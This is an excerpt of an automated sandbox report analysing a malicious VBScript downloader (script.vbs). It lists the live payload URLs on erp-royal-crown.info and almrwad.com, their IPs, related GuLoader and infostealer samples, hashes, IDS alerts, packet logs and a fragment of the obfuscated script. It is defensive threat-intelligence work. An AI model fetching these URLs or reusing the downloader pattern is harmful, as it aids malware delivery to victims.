              NameMaliciousAntivirus DetectionReputation
              https://www.erp-royal-crown.info/wh/Subordinerendes78.smifalse
              • Avira URL Cloud: phishing
              		unknown
              https://www.almrwad.com/wh/Subordinerendes78.smifalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3368008516.0000029A5FD44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://almrwad.compowershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50C3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50E33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A519B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A512E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5152E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A508EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5042E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50104000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.erp-royal-crown.infopowershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50EE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5104C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51513000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50D7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A503E0000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://erp-royal-crown.infopowershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50EE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5104C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51513000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50D7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A503E0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.erp-royal-crown.infopowershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50EE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5104C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50D7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51503000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://contoso.com/powershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3368008516.0000029A5FD44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.almrwad.compowershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50E33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A512E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5152E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A508EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5042E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50104000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000001.00000002.3347944576.0000029A4FB91000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.erp-royal-crown.info/wh/Subordinerendes78.smiXpowershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              		unknown
                              http://www.almrwad.compowershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50C3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50E33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A519B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A512E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5152E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A508EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5042E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50104000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.3347944576.0000029A4FB91000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  148.251.114.233
                                  		erp-royal-crown.infoGermany
                                  		24940HETZNER-ASDEfalse
                                  184.171.244.231
                                  		almrwad.comUnited States
                                  		33182DIMENOCUSfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1569003
                                  Start date and time:2024-12-05 10:42:51 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 47s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:7
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:script.vbs
                                  Detection:MAL
                                  Classification:mal100.expl.evad.winVBS@6/3@2/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 6
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 3504 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: script.vbs

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  04:43:46API Interceptor3670870x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  148.251.114.233PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/fchs/
                                  PO23100072.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  PO-000001488.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  184.171.244.231mg.vbsGet hashmaliciousUnknownBrowse
                                    mj.ps1Get hashmaliciousUnknownBrowse
                                      ap.ps1Get hashmaliciousUnknownBrowse
                                        cu.ps1Get hashmaliciousUnknownBrowse
                                          Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                            ni.ps1Get hashmaliciousUnknownBrowse
                                              qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                yd2.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                  List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    DIMENOCUSmg.vbsGet hashmaliciousUnknownBrowse
                                                    • 184.171.244.231
                                                    mj.ps1Get hashmaliciousUnknownBrowse
                                                    • 184.171.244.231
                                                    ap.ps1Get hashmaliciousUnknownBrowse
                                                    • 184.171.244.231
                                                    cu.ps1Get hashmaliciousUnknownBrowse
                                                    • 184.171.244.231
                                                    Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                    • 184.171.244.231
                                                    ni.ps1Get hashmaliciousUnknownBrowse
                                                    • 184.171.244.231
                                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, RHADAMANTHYS, Stealc, VidarBrowse
                                                    • 67.23.237.28
                                                    file.exeGet hashmaliciousAmadeyBrowse
                                                    • 67.23.237.28
                                                    mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 8.33.162.220
                                                    Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousHTMLPhisherBrowse
                                                    • 177.234.150.226
                                                    HETZNER-ASDEmg.vbsGet hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    mj.ps1Get hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    ap.ps1Get hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    cu.ps1Get hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    ni.ps1Get hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                    • 88.99.61.52
                                                    https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#CGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                    • 5.9.227.67
                                                    Ttok18.exeGet hashmaliciousVidarBrowse
                                                    • 159.69.102.165
                                                    jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                    • 159.69.102.165

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0emg.vbsGet hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    mj.ps1Get hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    ap.ps1Get hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    cu.ps1Get hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    ni.ps1Get hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231
                                                    R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                    • 148.251.114.233
                                                    • 184.171.244.231

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):11608
                                                    Entropy (8bit):4.890472898059848
                                                    Encrypted:false
                                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                    MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                    SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                    SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                    SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3vvls3d.ffp.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqymnzoz.5jr.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    Static File Info

                                                    General

                                                    File type:ASCII text, with very long lines (316), with CRLF line terminators
                                                    Entropy (8bit):5.167531895335876
                                                    TrID:
                                                    • Visual Basic Script (13500/0) 100.00%
                                                    File name:script.vbs
                                                    File size:29'285 bytes
                                                    MD5:369a268623fe3fce785ddb3a426f8d0c
                                                    SHA1:0bff2afa8619c1071cc6b6ae3bf721cd5f9b3af7
                                                    SHA256:14543dc9229fff1538526bcb09a6ad9a3809b3cea089c6adc69dbe7aec438b4c
                                                    SHA512:3764c1cc60427e5eda527b1bae46dfac6150523a27f38301d4881f389388c48eddb42e372a208e61514f19ac0c62edd3218e1f04d3ca39990bb7db421bd08145
                                                    SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182ur:504lKT1P0yfqAuiNbtur
                                                    TLSH:A8D21AD3CAC625188A9509B7DD130BB34DA1456E77131F38A3BCCA5D908395CA2BFBC9
                                                    File Content Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirer

                                                    File Icon

                                                    Icon Hash:68d69b8f86ab9a86

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-12-05T10:43:55.240728+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549705184.171.244.231443TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 5, 2024 10:43:47.368726969 CET49704443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:47.368772030 CET44349704184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:47.369301081 CET49704443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:47.375236034 CET49704443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:47.375250101 CET44349704184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:48.645936966 CET44349704184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:48.646085024 CET49704443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:48.694375038 CET49704443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:48.694397926 CET44349704184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:48.694794893 CET44349704184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:48.708300114 CET49704443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:48.751331091 CET44349704184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:49.099104881 CET44349704184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:49.099559069 CET44349704184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:49.103915930 CET49704443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:49.115916967 CET49704443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:53.518639088 CET49705443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:53.518712044 CET44349705184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:53.518820047 CET49705443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:53.519340038 CET49705443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:53.519357920 CET44349705184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:54.778685093 CET44349705184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:54.817698956 CET49705443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:54.817748070 CET44349705184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:55.240761042 CET44349705184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:55.240823984 CET44349705184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:43:55.240906954 CET49705443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:55.250224113 CET49705443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:43:59.395504951 CET49706443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:43:59.395562887 CET44349706148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:43:59.395653009 CET49706443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:43:59.396106958 CET49706443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:43:59.396117926 CET44349706148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:00.885808945 CET44349706148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:00.885889053 CET49706443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:00.888010979 CET49706443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:00.888021946 CET44349706148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:00.888317108 CET44349706148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:00.889360905 CET49706443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:00.931333065 CET44349706148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:01.436394930 CET44349706148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:01.437169075 CET44349706148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:01.437232018 CET49706443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:01.437738895 CET49706443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:05.454462051 CET49718443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:05.454540968 CET44349718184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:05.454704046 CET49718443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:05.455789089 CET49718443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:05.455796003 CET44349718184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:06.724922895 CET44349718184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:06.730691910 CET49718443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:06.730721951 CET44349718184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:07.186506033 CET44349718184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:07.186578989 CET44349718184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:07.186686039 CET49718443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:07.187247038 CET49718443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:11.207879066 CET49735443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:11.207967997 CET44349735148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:11.208118916 CET49735443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:11.208404064 CET49735443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:11.208417892 CET44349735148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:12.617507935 CET44349735148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:12.624502897 CET49735443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:12.624540091 CET44349735148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:13.164555073 CET44349735148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:13.164729118 CET44349735148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:13.168051958 CET49735443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:13.168817997 CET49735443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:17.193552017 CET49751443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:17.193598032 CET44349751184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:17.193660975 CET49751443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:17.193977118 CET49751443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:17.193985939 CET44349751184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:18.458026886 CET44349751184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:18.498152971 CET49751443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:18.498176098 CET44349751184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:18.917835951 CET44349751184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:18.917908907 CET44349751184.171.244.231192.168.2.5
